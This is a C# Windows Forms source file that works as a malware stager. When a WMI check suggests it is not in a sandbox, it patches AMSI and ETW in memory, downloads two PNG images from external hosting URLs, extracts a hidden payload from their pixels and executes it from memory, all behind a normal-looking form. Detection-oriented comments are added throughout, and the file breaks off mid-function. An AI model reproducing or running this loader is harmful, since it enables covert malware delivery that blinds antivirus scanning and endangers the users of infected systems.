using System;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Linq;
using System.Management;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
using System.Windows.Forms;
using WindowsFormsApp1;
namespace Program
{
static class Program
{
    /// <summary>
    /// The main entry point for the application.
    /// </summary>
    /// <remarks>
    /// Behaviour as written: if the WMI heuristic in <see cref="VM"/> returns false, this
    /// first calls <see cref="A.B"/> (which overwrites the entry of AmsiScanBuffer and
    /// EtwEventWrite in this process), then downloads two PNG images, recovers a byte array
    /// from each with <see cref="DE"/>, loads the second as a .NET assembly from memory and
    /// invokes its entry point. In every case it finishes by showing Form1.
    ///
    /// Defender notes: observable signals are the WMI query in VM(), the HTTP fetches of the
    /// two image URLs below by a WinForms process, a memory-protection change on amsi.dll /
    /// ntdll.dll pages (see A.PatchMem) and an Assembly.Load from a byte[] with no backing
    /// file. The AMSI/ETW patches happen before Assembly.Load, so AMSI scanning and the
    /// runtime's ETW providers will not see the loaded assembly; kernel-level telemetry
    /// (memory-protection callbacks, network) is unaffected by the patch.
    /// </remarks>
    [STAThread]
    static void Main()
    {
        // Payload path runs only when VM() reports at least one Win32_CacheMemory row.
        if (!VM())
        {
            // Disables AMSI and ETW reporting in this process before anything is downloaded.
            A.B();

            // Carrier images: the bytes are hidden in the red channel of the pixels (see DE).
            string LDer = @"https://s1.ax1x.com/2020/04/28/J4Zp9S.png"; // first stage ("loader"); decoded below but not used
            string FI_LE = @"https://z3.ax1x.com/2021/07/05/RhfFGn.png"; // second stage; this is what gets executed

            // Plain WebRequest with no timeout, proxy or TLS settings beyond the defaults.
            var requestLDer = WebRequest.Create(LDer);
            var requestFI_LE = WebRequest.Create(FI_LE);
            Bitmap LDerIMG;
            Bitmap FI_LEIMG;

            using (var response = requestLDer.GetResponse())
            using (var stream = response.GetResponseStream())
            {
                LDerIMG = (Bitmap)Image.FromStream(stream);
            }
            using (var response = requestFI_LE.GetResponse())
            using (var stream = response.GetResponseStream())
            {
                FI_LEIMG = (Bitmap)Image.FromStream(stream);
            }

            // Neither Bitmap is disposed.
            byte[] outputLDer = DE(LDerIMG);
            byte[] outputFI_LE = DE(FI_LEIMG);

            // outputLDer's only consumer is this commented-out line, so it is dead work.
            //Assembly.Load(outputLDer).GetType("loader.loader").GetMethod("RunProgram").Invoke(null, new object[] { outputFI_LE });
            // In-memory load and execution: no file is written to disk. Any exception from the
            // download, decode, load or invoke propagates out of Main unhandled.
            Assembly.Load(outputFI_LE).EntryPoint.Invoke(null, null);
        }
        // Normal WinForms startup; shown whether or not the branch above ran.
        Application.EnableVisualStyles();
        Application.SetCompatibleTextRenderingDefault(false);
        Application.Run(new Form1());
    }

    /// <summary>
    /// Recovers a byte array hidden in an image: for every pixel except those in row 0 and
    /// column 0, the red channel value is appended as one character; NUL characters are
    /// stripped and the remaining text is Base64-decoded.
    /// </summary>
    /// <param name="img">Carrier bitmap. Only the red channel is read; G, B and A are ignored.</param>
    /// <returns>The Base64-decoded bytes.</returns>
    /// <exception cref="FormatException">The recovered text is not valid Base64.</exception>
    public static byte[] DE(Bitmap img)
    {
        StringBuilder holder = new StringBuilder();
        int xmax = img.Width - 1;
        int ymax = img.Height - 1;
        // Both loops start at 1, so the first row and first column are skipped.
        for (int y = 1; y <= ymax; y++)
        {
            for (int x = 1; x <= xmax; x++)
            {
                Color c = img.GetPixel(x, y);
                holder.Append((char)c.R);
            }
        }

        // Pixels with R == 0 become '\0' characters and are removed before decoding.
        return Convert.FromBase64String(holder.ToString().Replace(Convert.ToChar(0).ToString(), ""));
    }

    /// <summary>
    /// Sandbox/VM heuristic (by name and by its use in <see cref="Main"/>): counts the rows
    /// returned by the WMI query "Select * from Win32_CacheMemory".
    /// </summary>
    /// <returns>
    /// true when the query returns no instances (Main then skips the payload), false otherwise.
    /// </returns>
    /// <remarks>
    /// Defender note: a WMI query against Win32_CacheMemory from a process that has no
    /// hardware-inventory purpose is itself a useful telemetry signal (WMI-Activity provider).
    /// </remarks>
    public static bool VM()
    {
        SelectQuery selectQuery = new SelectQuery("Select * from Win32_CacheMemory");
        ManagementObjectSearcher searcher = new ManagementObjectSearcher(selectQuery);
        int i = 0;
        // Neither the searcher nor the enumerated ManagementObjects are disposed.
        foreach (ManagementObject DeviceID in searcher.Get())
        {
            i++;
        }
        if (i == 0)
        {
            return true;
        }
        else
        {
            return false;
        }
    }
}
/// <summary>
/// Minimal D/Invoke-style dynamic call helper: resolves an export by walking the loaded
/// module's PE export table in memory, then calls it through a delegate created with
/// <see cref="Marshal.GetDelegateForFunctionPointer(IntPtr, Type)"/>. Only
/// ntdll!NtProtectVirtualMemory is wired up.
/// </summary>
/// <remarks>
/// Defender note: because no DllImport is used, the call does not appear in the assembly's
/// P/Invoke metadata or import table. The call still goes through ntdll, and memory-protection
/// changes on executable pages remain visible to kernel-level telemetry.
/// </remarks>
public class DInvokeCore
{
    // Subset of the public NTSTATUS codes. Only Success is compared against in this file.
    public enum NTSTATUS : uint
    {
        // Success
        Success = 0x00000000,
        Wait0 = 0x00000000,
        Wait1 = 0x00000001,
        Wait2 = 0x00000002,
        Wait3 = 0x00000003,
        Wait63 = 0x0000003f,
        Abandoned = 0x00000080,
        AbandonedWait0 = 0x00000080,
        AbandonedWait1 = 0x00000081,
        AbandonedWait2 = 0x00000082,
        AbandonedWait3 = 0x00000083,
        AbandonedWait63 = 0x000000bf,
        UserApc = 0x000000c0,
        KernelApc = 0x00000100,
        Alerted = 0x00000101,
        Timeout = 0x00000102,
        Pending = 0x00000103,
        Reparse = 0x00000104,
        MoreEntries = 0x00000105,
        NotAllAssigned = 0x00000106,
        SomeNotMapped = 0x00000107,
        OpLockBreakInProgress = 0x00000108,
        VolumeMounted = 0x00000109,
        RxActCommitted = 0x0000010a,
        NotifyCleanup = 0x0000010b,
        NotifyEnumDir = 0x0000010c,
        NoQuotasForAccount = 0x0000010d,
        PrimaryTransportConnectFailed = 0x0000010e,
        PageFaultTransition = 0x00000110,
        PageFaultDemandZero = 0x00000111,
        PageFaultCopyOnWrite = 0x00000112,
        PageFaultGuardPage = 0x00000113,
        PageFaultPagingFile = 0x00000114,
        CrashDump = 0x00000116,
        ReparseObject = 0x00000118,
        NothingToTerminate = 0x00000122,
        ProcessNotInJob = 0x00000123,
        ProcessInJob = 0x00000124,
        ProcessCloned = 0x00000129,
        FileLockedWithOnlyReaders = 0x0000012a,
        FileLockedWithWriters = 0x0000012b,

        // Informational
        Informational = 0x40000000,
        ObjectNameExists = 0x40000000,
        ThreadWasSuspended = 0x40000001,
        WorkingSetLimitRange = 0x40000002,
        ImageNotAtBase = 0x40000003,
        RegistryRecovered = 0x40000009,

        // Warning
        Warning = 0x80000000,
        GuardPageViolation = 0x80000001,
        DatatypeMisalignment = 0x80000002,
        Breakpoint = 0x80000003,
        SingleStep = 0x80000004,
        BufferOverflow = 0x80000005,
        NoMoreFiles = 0x80000006,
        HandlesClosed = 0x8000000a,
        PartialCopy = 0x8000000d,
        DeviceBusy = 0x80000011,
        InvalidEaName = 0x80000013,
        EaListInconsistent = 0x80000014,
        NoMoreEntries = 0x8000001a,
        LongJump = 0x80000026,
        DllMightBeInsecure = 0x8000002b,

        // Error
        Error = 0xc0000000,
        Unsuccessful = 0xc0000001,
        NotImplemented = 0xc0000002,
        InvalidInfoClass = 0xc0000003,
        InfoLengthMismatch = 0xc0000004,
        AccessViolation = 0xc0000005,
        InPageError = 0xc0000006,
        PagefileQuota = 0xc0000007,
        InvalidHandle = 0xc0000008,
        BadInitialStack = 0xc0000009,
        BadInitialPc = 0xc000000a,
        InvalidCid = 0xc000000b,
        TimerNotCanceled = 0xc000000c,
        InvalidParameter = 0xc000000d,
        NoSuchDevice = 0xc000000e,
        NoSuchFile = 0xc000000f,
        InvalidDeviceRequest = 0xc0000010,
        EndOfFile = 0xc0000011,
        WrongVolume = 0xc0000012,
        NoMediaInDevice = 0xc0000013,
        NoMemory = 0xc0000017,
        ConflictingAddresses = 0xc0000018,
        NotMappedView = 0xc0000019,
        UnableToFreeVm = 0xc000001a,
        UnableToDeleteSection = 0xc000001b,
        IllegalInstruction = 0xc000001d,
        AlreadyCommitted = 0xc0000021,
        AccessDenied = 0xc0000022,
        BufferTooSmall = 0xc0000023,
        ObjectTypeMismatch = 0xc0000024,
        NonContinuableException = 0xc0000025,
        BadStack = 0xc0000028,
        NotLocked = 0xc000002a,
        NotCommitted = 0xc000002d,
        InvalidParameterMix = 0xc0000030,
        ObjectNameInvalid = 0xc0000033,
        ObjectNameNotFound = 0xc0000034,
        ObjectNameCollision = 0xc0000035,
        ObjectPathInvalid = 0xc0000039,
        ObjectPathNotFound = 0xc000003a,
        ObjectPathSyntaxBad = 0xc000003b,
        DataOverrun = 0xc000003c,
        DataLate = 0xc000003d,
        DataError = 0xc000003e,
        CrcError = 0xc000003f,
        SectionTooBig = 0xc0000040,
        PortConnectionRefused = 0xc0000041,
        InvalidPortHandle = 0xc0000042,
        SharingViolation = 0xc0000043,
        QuotaExceeded = 0xc0000044,
        InvalidPageProtection = 0xc0000045,
        MutantNotOwned = 0xc0000046,
        SemaphoreLimitExceeded = 0xc0000047,
        PortAlreadySet = 0xc0000048,
        SectionNotImage = 0xc0000049,
        SuspendCountExceeded = 0xc000004a,
        ThreadIsTerminating = 0xc000004b,
        BadWorkingSetLimit = 0xc000004c,
        IncompatibleFileMap = 0xc000004d,
        SectionProtection = 0xc000004e,
        EasNotSupported = 0xc000004f,
        EaTooLarge = 0xc0000050,
        NonExistentEaEntry = 0xc0000051,
        NoEasOnFile = 0xc0000052,
        EaCorruptError = 0xc0000053,
        FileLockConflict = 0xc0000054,
        LockNotGranted = 0xc0000055,
        DeletePending = 0xc0000056,
        CtlFileNotSupported = 0xc0000057,
        UnknownRevision = 0xc0000058,
        RevisionMismatch = 0xc0000059,
        InvalidOwner = 0xc000005a,
        InvalidPrimaryGroup = 0xc000005b,
        NoImpersonationToken = 0xc000005c,
        CantDisableMandatory = 0xc000005d,
        NoLogonServers = 0xc000005e,
        NoSuchLogonSession = 0xc000005f,
        NoSuchPrivilege = 0xc0000060,
        PrivilegeNotHeld = 0xc0000061,
        InvalidAccountName = 0xc0000062,
        UserExists = 0xc0000063,
        NoSuchUser = 0xc0000064,
        GroupExists = 0xc0000065,
        NoSuchGroup = 0xc0000066,
        MemberInGroup = 0xc0000067,
        MemberNotInGroup = 0xc0000068,
        LastAdmin = 0xc0000069,
        WrongPassword = 0xc000006a,
        IllFormedPassword = 0xc000006b,
        PasswordRestriction = 0xc000006c,
        LogonFailure = 0xc000006d,
        AccountRestriction = 0xc000006e,
        InvalidLogonHours = 0xc000006f,
        InvalidWorkstation = 0xc0000070,
        PasswordExpired = 0xc0000071,
        AccountDisabled = 0xc0000072,
        NoneMapped = 0xc0000073,
        TooManyLuidsRequested = 0xc0000074,
        LuidsExhausted = 0xc0000075,
        InvalidSubAuthority = 0xc0000076,
        InvalidAcl = 0xc0000077,
        InvalidSid = 0xc0000078,
        InvalidSecurityDescr = 0xc0000079,
        ProcedureNotFound = 0xc000007a,
        InvalidImageFormat = 0xc000007b,
        NoToken = 0xc000007c,
        BadInheritanceAcl = 0xc000007d,
        RangeNotLocked = 0xc000007e,
        DiskFull = 0xc000007f,
        ServerDisabled = 0xc0000080,
        ServerNotDisabled = 0xc0000081,
        TooManyGuidsRequested = 0xc0000082,
        GuidsExhausted = 0xc0000083,
        InvalidIdAuthority = 0xc0000084,
        AgentsExhausted = 0xc0000085,
        InvalidVolumeLabel = 0xc0000086,
        SectionNotExtended = 0xc0000087,
        NotMappedData = 0xc0000088,
        ResourceDataNotFound = 0xc0000089,
        ResourceTypeNotFound = 0xc000008a,
        ResourceNameNotFound = 0xc000008b,
        ArrayBoundsExceeded = 0xc000008c,
        FloatDenormalOperand = 0xc000008d,
        FloatDivideByZero = 0xc000008e,
        FloatInexactResult = 0xc000008f,
        FloatInvalidOperation = 0xc0000090,
        FloatOverflow = 0xc0000091,
        FloatStackCheck = 0xc0000092,
        FloatUnderflow = 0xc0000093,
        IntegerDivideByZero = 0xc0000094,
        IntegerOverflow = 0xc0000095,
        PrivilegedInstruction = 0xc0000096,
        TooManyPagingFiles = 0xc0000097,
        FileInvalid = 0xc0000098,
        InsufficientResources = 0xc000009a,
        InstanceNotAvailable = 0xc00000ab,
        PipeNotAvailable = 0xc00000ac,
        InvalidPipeState = 0xc00000ad,
        PipeBusy = 0xc00000ae,
        IllegalFunction = 0xc00000af,
        PipeDisconnected = 0xc00000b0,
        PipeClosing = 0xc00000b1,
        PipeConnected = 0xc00000b2,
        PipeListening = 0xc00000b3,
        InvalidReadMode = 0xc00000b4,
        IoTimeout = 0xc00000b5,
        FileForcedClosed = 0xc00000b6,
        ProfilingNotStarted = 0xc00000b7,
        ProfilingNotStopped = 0xc00000b8,
        NotSameDevice = 0xc00000d4,
        FileRenamed = 0xc00000d5,
        CantWait = 0xc00000d8,
        PipeEmpty = 0xc00000d9,
        CantTerminateSelf = 0xc00000db,
        InternalError = 0xc00000e5,
        InvalidParameter1 = 0xc00000ef,
        InvalidParameter2 = 0xc00000f0,
        InvalidParameter3 = 0xc00000f1,
        InvalidParameter4 = 0xc00000f2,
        InvalidParameter5 = 0xc00000f3,
        InvalidParameter6 = 0xc00000f4,
        InvalidParameter7 = 0xc00000f5,
        InvalidParameter8 = 0xc00000f6,
        InvalidParameter9 = 0xc00000f7,
        InvalidParameter10 = 0xc00000f8,
        InvalidParameter11 = 0xc00000f9,
        InvalidParameter12 = 0xc00000fa,
        ProcessIsTerminating = 0xc000010a,
        MappedFileSizeZero = 0xc000011e,
        TooManyOpenedFiles = 0xc000011f,
        Cancelled = 0xc0000120,
        CannotDelete = 0xc0000121,
        InvalidComputerName = 0xc0000122,
        FileDeleted = 0xc0000123,
        SpecialAccount = 0xc0000124,
        SpecialGroup = 0xc0000125,
        SpecialUser = 0xc0000126,
        MembersPrimaryGroup = 0xc0000127,
        FileClosed = 0xc0000128,
        TooManyThreads = 0xc0000129,
        ThreadNotInProcess = 0xc000012a,
        TokenAlreadyInUse = 0xc000012b,
        PagefileQuotaExceeded = 0xc000012c,
        CommitmentLimit = 0xc000012d,
        InvalidImageLeFormat = 0xc000012e,
        InvalidImageNotMz = 0xc000012f,
        InvalidImageProtect = 0xc0000130,
        InvalidImageWin16 = 0xc0000131,
        LogonServer = 0xc0000132,
        DifferenceAtDc = 0xc0000133,
        SynchronizationRequired = 0xc0000134,
        DllNotFound = 0xc0000135,
        IoPrivilegeFailed = 0xc0000137,
        OrdinalNotFound = 0xc0000138,
        EntryPointNotFound = 0xc0000139,
        ControlCExit = 0xc000013a,
        InvalidAddress = 0xc0000141,
        PortNotSet = 0xc0000353,
        DebuggerInactive = 0xc0000354,
        CallbackBypass = 0xc0000503,
        PortClosed = 0xc0000700,
        MessageLost = 0xc0000701,
        InvalidMessage = 0xc0000702,
        RequestCanceled = 0xc0000703,
        RecursiveDispatch = 0xc0000704,
        LpcReceiveBufferExpected = 0xc0000705,
        LpcInvalidConnectionUsage = 0xc0000706,
        LpcRequestsNotAllowed = 0xc0000707,
        ResourceInUse = 0xc0000708,
        ProcessIsProtected = 0xc0000712,
        VolumeDirty = 0xc0000806,
        FileCheckedOut = 0xc0000901,
        CheckOutRequired = 0xc0000902,
        BadFileType = 0xc0000903,
        FileTooLarge = 0xc0000904,
        FormsAuthRequired = 0xc0000905,
        VirusInfected = 0xc0000906,
        VirusDeleted = 0xc0000907,
        TransactionalConflict = 0xc0190001,
        InvalidTransaction = 0xc0190002,
        TransactionNotActive = 0xc0190003,
        TmInitializationFailed = 0xc0190004,
        RmNotActive = 0xc0190005,
        RmMetadataCorrupt = 0xc0190006,
        TransactionNotJoined = 0xc0190007,
        DirectoryNotRm = 0xc0190008,
        CouldNotResizeLog = 0xc0190009,
        TransactionsUnsupportedRemote = 0xc019000a,
        LogResizeInvalidSize = 0xc019000b,
        RemoteFileVersionMismatch = 0xc019000c,
        CrmProtocolAlreadyExists = 0xc019000f,
        TransactionPropagationFailed = 0xc0190010,
        CrmProtocolNotFound = 0xc0190011,
        TransactionSuperiorExists = 0xc0190012,
        TransactionRequestNotValid = 0xc0190013,
        TransactionNotRequested = 0xc0190014,
        TransactionAlreadyAborted = 0xc0190015,
        TransactionAlreadyCommitted = 0xc0190016,
        TransactionInvalidMarshallBuffer = 0xc0190017,
        CurrentTransactionNotValid = 0xc0190018,
        LogGrowthFailed = 0xc0190019,
        ObjectNoLongerExists = 0xc0190021,
        StreamMiniversionNotFound = 0xc0190022,
        StreamMiniversionNotValid = 0xc0190023,
        MiniversionInaccessibleFromSpecifiedTransaction = 0xc0190024,
        CantOpenMiniversionWithModifyIntent = 0xc0190025,
        CantCreateMoreStreamMiniversions = 0xc0190026,
        HandleNoLongerValid = 0xc0190028,
        NoTxfMetadata = 0xc0190029,
        LogCorruptionDetected = 0xc0190030,
        CantRecoverWithHandleOpen = 0xc0190031,
        RmDisconnected = 0xc0190032,
        EnlistmentNotSuperior = 0xc0190033,
        RecoveryNotNeeded = 0xc0190034,
        RmAlreadyStarted = 0xc0190035,
        FileIdentityNotPersistent = 0xc0190036,
        CantBreakTransactionalDependency = 0xc0190037,
        CantCrossRmBoundary = 0xc0190038,
        TxfDirNotEmpty = 0xc0190039,
        IndoubtTransactionsExist = 0xc019003a,
        TmVolatile = 0xc019003b,
        RollbackTimerExpired = 0xc019003c,
        TxfAttributeCorrupt = 0xc019003d,
        EfsNotAllowedInTransaction = 0xc019003e,
        TransactionalOpenNotAllowed = 0xc019003f,
        TransactedMappingUnsupportedRemote = 0xc0190040,
        TxfMetadataAlreadyPresent = 0xc0190041,
        TransactionScopeCallbacksNotSet = 0xc0190042,
        TransactionRequiredPromotion = 0xc0190043,
        CannotExecuteFileInTransaction = 0xc0190044,
        TransactionsNotFrozen = 0xc0190045,

        MaximumNtStatus = 0xffffffff
    }

    // Delegate types used with Marshal.GetDelegateForFunctionPointer.
    public class Delegates
    {
        // Signature of ntdll!NtProtectVirtualMemory. The `ref` parameters are updated by the
        // native call; after Delegate.DynamicInvoke they are read back from the object[] arguments.
        [UnmanagedFunctionPointer(CallingConvention.StdCall)]
        public delegate UInt32 NtProtectVirtualMemory(
            IntPtr ProcessHandle,
            ref IntPtr BaseAddress,
            ref IntPtr RegionSize,
            UInt32 NewProtect,
            ref UInt32 OldProtect);
    }

    /// <summary>
    /// Resolves an export of an already-loaded module by name.
    /// </summary>
    /// <param name="DLLName">Module file name as listed in Process.Modules (case-insensitive).</param>
    /// <param name="FunctionName">Export name (case-insensitive).</param>
    /// <returns>Absolute address of the export.</returns>
    /// <exception cref="DllNotFoundException">The module is not loaded in this process; nothing is loaded on demand.</exception>
    /// <exception cref="MissingMethodException">The module has no export of that name (from GetExportAddress).</exception>
    /// <exception cref="InvalidOperationException">The export table could not be parsed (from GetExportAddress).</exception>
    private static IntPtr GetLibraryAddress(string DLLName, string FunctionName)
    {
        IntPtr hModule = GetLoadedModuleAddress(DLLName);
        if (hModule == IntPtr.Zero)
        {
            throw new DllNotFoundException(DLLName + ", Dll was not found or not loaded.");
        }
        IntPtr lastOutput = GetExportAddress(hModule, FunctionName);
        return lastOutput;
    }

    /// <summary>
    /// Finds the base address of a module loaded in the current process by enumerating
    /// Process.Modules (no LoadLibrary / GetModuleHandle call).
    /// </summary>
    /// <param name="DLLName">Module name compared case-insensitively (string.Compare with ignoreCase, i.e. current culture).</param>
    /// <returns>The module's base address, or IntPtr.Zero when it is not loaded.</returns>
    private static IntPtr GetLoadedModuleAddress(string DLLName)
    {
        // The Process object is not disposed.
        Process CurrentProcess = Process.GetCurrentProcess();
        foreach (ProcessModule Module in CurrentProcess.Modules)
        {
            if (string.Compare(Module.ModuleName, DLLName, true) == 0)
            {
                IntPtr ModuleBasePointer = Module.BaseAddress;
                return ModuleBasePointer;
            }
        }
        return IntPtr.Zero;
    }

    /// <summary>
    /// Walks the in-memory PE export directory of a loaded module and returns the address of
    /// the named export. Identical to A.GetExportAddress apart from the not-found message.
    /// </summary>
    /// <param name="ModuleBase">Base address of a mapped PE image.</param>
    /// <param name="ExportName">Export name, compared ordinal-ignore-case.</param>
    /// <returns>Absolute address of the export.</returns>
    /// <exception cref="InvalidOperationException">Any exception during parsing (no bounds checks are done, so a bad base or corrupt header ends here).</exception>
    /// <exception cref="MissingMethodException">No export with that name was found.</exception>
    /// <remarks>
    /// Limitations visible in the code: forwarded exports are not detected (the returned address
    /// would point at a forwarder string), and ordinals are read as signed Int16, so an ordinal of
    /// 0x8000 or above would index incorrectly.
    /// </remarks>
    private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
    {
        IntPtr FunctionPtr = IntPtr.Zero;
        try
        {
            // Traverse the PE header in memory
            Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));                  // e_lfanew
            Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); // SizeOfOptionalHeader; read but unused
            Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;                                  // start of IMAGE_OPTIONAL_HEADER
            Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
            Int64 pExport = 0;
            // 0x10b = PE32 (32-bit), anything else is treated as PE32+; picks the export data directory offset.
            if (Magic == 0x010b)
            {
                pExport = OptHeader + 0x60;
            }
            else
            {
                pExport = OptHeader + 0x70;
            }

            // Read -> IMAGE_EXPORT_DIRECTORY
            Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
            Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
            Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); // read but unused
            Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
            Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
            Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20));
            Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24));

            // Loop the array of export name RVA's
            for (int i = 0; i < NumberOfNames; i++)
            {
                string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4))));
                if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase))
                {
                    // OrdinalBase is added here and subtracted again on the next line, so the
                    // index into AddressOfFunctions is the raw value from AddressOfNameOrdinals.
                    Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase;
                    Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase))));
                    FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA);
                    break;
                }
            }
        }
        catch
        {
            // Catch parser failure: the original exception (typically AccessViolation on a bad
            // address) is discarded, so the cause is not recoverable from this message.
            throw new InvalidOperationException("Failed to parse module exports.");
        }

        if (FunctionPtr == IntPtr.Zero)
        {
            // Export not found
            throw new MissingMethodException(ExportName + ", export not found.");
        }
        return FunctionPtr;
    }

    /// <summary>
    /// Resolves <paramref name="FunctionName"/> in <paramref name="DLLName"/> and invokes it
    /// through a delegate of type <paramref name="FunctionDelegateType"/>.
    /// </summary>
    /// <param name="DLLName">Loaded module name.</param>
    /// <param name="FunctionName">Export name.</param>
    /// <param name="FunctionDelegateType">A delegate type matching the native signature.</param>
    /// <param name="Parameters">Boxed arguments; `ref` parameters of the delegate are written back into this array.</param>
    /// <returns>The boxed return value of the native call.</returns>
    /// <exception cref="InvalidOperationException">The resolved address is zero (GetExportAddress already throws on not-found, so this branch is effectively unreachable).</exception>
    public static object DynamicAPIInvoke(string DLLName, string FunctionName, Type FunctionDelegateType, ref object[] Parameters)
    {
        IntPtr pFunction = GetLibraryAddress(DLLName, FunctionName);
        if (pFunction == IntPtr.Zero)
        {
            throw new InvalidOperationException("Could not get the handle for the function.");
        }
        return DynamicFunctionInvoke(pFunction, FunctionDelegateType, ref Parameters);
    }

    /// <summary>
    /// Wraps a raw function pointer in a delegate of the given type and calls it with
    /// <see cref="Delegate.DynamicInvoke(object[])"/>.
    /// </summary>
    /// <param name="FunctionPointer">Native code address.</param>
    /// <param name="FunctionDelegateType">Delegate type describing the native signature.</param>
    /// <param name="Parameters">Boxed arguments; byref parameters are updated in place.</param>
    /// <returns>The boxed native return value.</returns>
    private static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters)
    {
        Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType);
        return funcDelegate.DynamicInvoke(Parameters);
    }

    /// <summary>
    /// Calls ntdll!NtProtectVirtualMemory through <see cref="DynamicAPIInvoke"/>.
    /// </summary>
    /// <param name="ProcessHandle">Target process handle (callers in this file pass -1, the current-process pseudo-handle).</param>
    /// <param name="BaseAddress">Start of the region. Not written back: the page-rounded value the native call returns in funcargs[1] is discarded.</param>
    /// <param name="RegionSize">Region size. Likewise not written back from funcargs[2].</param>
    /// <param name="NewProtect">PAGE_* protection constant, passed through unchanged.</param>
    /// <param name="OldProtect">Receives the previous protection on success; zeroed first.</param>
    /// <returns>true when the native call returns NTSTATUS.Success, false for any other status (the status value itself is dropped).</returns>
    public static bool NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect)
    {
        // Craft an array for the arguments
        OldProtect = 0;
        object[] funcargs = { ProcessHandle, BaseAddress, RegionSize, NewProtect, OldProtect };

        NTSTATUS retValue = (NTSTATUS)DynamicAPIInvoke(@"ntdll.dll", @"NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref funcargs);
        if (retValue != NTSTATUS.Success)
        {
            return false;
        }

        // Only OldProtect is copied back out of the argument array.
        OldProtect = (UInt32)funcargs[4];
        return true;
    }
}
/// <summary>
/// In-process patching of AmsiScanBuffer (amsi.dll) and EtwEventWrite (ntdll.dll): the first
/// bytes of each export are overwritten with a short stub so the function returns immediately.
/// Entry point is <see cref="B"/>.
/// </summary>
/// <remarks>
/// Defender notes: the patch changes the protection of a code page inside a system DLL to 0x40
/// (PAGE_EXECUTE_READWRITE) and never restores it, which leaves a writable executable page in
/// the image — detectable by memory scanners that compare mapped images against the on-disk
/// file or look for RWX pages in image sections. The string "amsi.dll" and the export names are
/// assembled at runtime (Base64 / concatenation) to avoid static string matches.
/// </remarks>
public class A
{
    // Bytes written over the first instructions of the target export, per architecture.
    // x64 ETW stub (4 bytes) — appears to be "xor eax,eax; ret"; confirm by disassembly.
    static byte[] x64_etw_patch = new byte[] { 0x48, 0x33, 0xC0, 0xC3 };
    // x86 ETW stub (5 bytes) — same idea with a stdcall "ret 0x14"; confirm by disassembly.
    static byte[] x86_etw_patch = new byte[] { 0x33, 0xc0, 0xc2, 0x14, 0x00 };
    // x64 AMSI stub (6 bytes) — the little-endian immediate is 0x80070057 (E_INVALIDARG); confirm by disassembly.
    static byte[] x64_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    // x86 AMSI stub (8 bytes) — same immediate, stdcall "ret 0x18"; confirm by disassembly.
    static byte[] x86_am_si_patch = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };

    // Thx D/Invoke!
    /// <summary>
    /// Copy of <see cref="DInvokeCore.GetExportAddress"/> (only the not-found message differs);
    /// walks the mapped PE export directory for <paramref name="ExportName"/>.
    /// </summary>
    /// <param name="ModuleBase">Base address of a mapped PE image.</param>
    /// <param name="ExportName">Export name, compared ordinal-ignore-case.</param>
    /// <returns>Absolute address of the export.</returns>
    /// <exception cref="InvalidOperationException">Any exception while parsing; there are no bounds checks.</exception>
    /// <exception cref="MissingMethodException">No export with that name.</exception>
    private static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName)
    {
        IntPtr FunctionPtr = IntPtr.Zero;
        try
        {
            // Traverse the PE header in memory
            Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C));                  // e_lfanew
            Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); // read but unused
            Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18;
            Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader);
            Int64 pExport = 0;
            // 0x10b = PE32; otherwise treated as PE32+.
            if (Magic == 0x010b)
            {
                pExport = OptHeader + 0x60;
            }
            else
            {
                pExport = OptHeader + 0x70;
            }

            // Read -> IMAGE_EXPORT_DIRECTORY
            Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport);
            Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10));
            Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); // read but unused
            Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18));
            Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C));
